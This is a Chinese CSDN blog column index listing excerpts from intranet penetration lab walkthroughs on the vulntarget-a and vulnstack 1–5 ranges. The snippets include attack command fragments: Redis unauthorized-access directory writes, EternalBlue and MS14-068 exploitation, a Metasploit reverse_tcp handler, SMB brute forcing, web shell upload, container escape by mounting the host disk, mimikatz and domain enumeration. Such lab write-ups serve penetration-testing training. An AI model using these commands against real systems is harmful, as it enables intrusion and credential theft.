![](https://img-blog.csdnimg.cn/20201014180756757.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网渗透系列
文章平均质量分 92
魏钦6666
大仙安全说
展开
-
内网渗透--vulntarget-a
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。原创 2023-04-04 17:31:34 · 1009 阅读 · 0 评论 -
红日(vulnstack)4 内网渗透ATT&CK实战
MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码。1.SHELL=bash script -q /dev/null //反弹交互式shell。mount /dev/sda1 hak //将宿主机/dev/sda1 目录挂载至容器内。3.因为靶机作者已经把利用工具已放到了桌面,切换到桌面目录,可以直接利用。./fscan -h 192.168.54.0/24 //开始扫描。8.把本地生成的木马,上传到win7的c盘,然后复制到域控的c盘。原创 2023-03-21 10:36:20 · 665 阅读 · 0 评论 -
红日(vulnstack)3 内网渗透ATT&CK实战
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset LHOST 192.168.1.106set LPORT 1106run使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破原创 2023-03-11 20:54:22 · 1695 阅读 · 0 评论 -
红日(vulnstack)5 内网渗透ATT&CK实战
win7 192.168.138.136 (仅主机模式) 192.168.135.150 (NET模式)4.要先run mimikatz拿到密码信息,再填好空格,点击launch 等一会域控就上线了。net group "domain computers" /domain //查看域控。3.成功拿到shell, 执行迁移进程命令, 系统会自动寻找合适的进程然后迁移。9.发现有ms17-010漏洞,并且开放139,135,445端口。4.发现存在漏洞,直接点getshell用蚁剑去连接。原创 2023-03-27 13:55:50 · 557 阅读 · 0 评论 -
红日(vulnstack)2 内网渗透ATT&CK实战
wls-wsat/CoordinatorPortType11 shell.jsp //上传木马。net group "domain computers" /domain //查看域中的其他主机名。net group "domain controllers" /domain //查看域控制器。net group "domain admins" /domain //查看域管理员。run autoroute -s 10.10.10.0/24 //添加路由。net user /domain //查看域用户。原创 2023-03-04 18:03:20 · 1356 阅读 · 0 评论 -
红日(vulnstack)1 内网渗透ATT&CK实战
8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3。kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4。开启之后数据库所有运行的日志会记录在general_log_file中。4.net use 发现建立成功后,上传木马程序。1.开启cs,生成木马,上传到蚁剑,执行。6.成功执行,whomi发现是系统权限。红日原创 2023-02-27 22:36:23 · 769 阅读 · 1 评论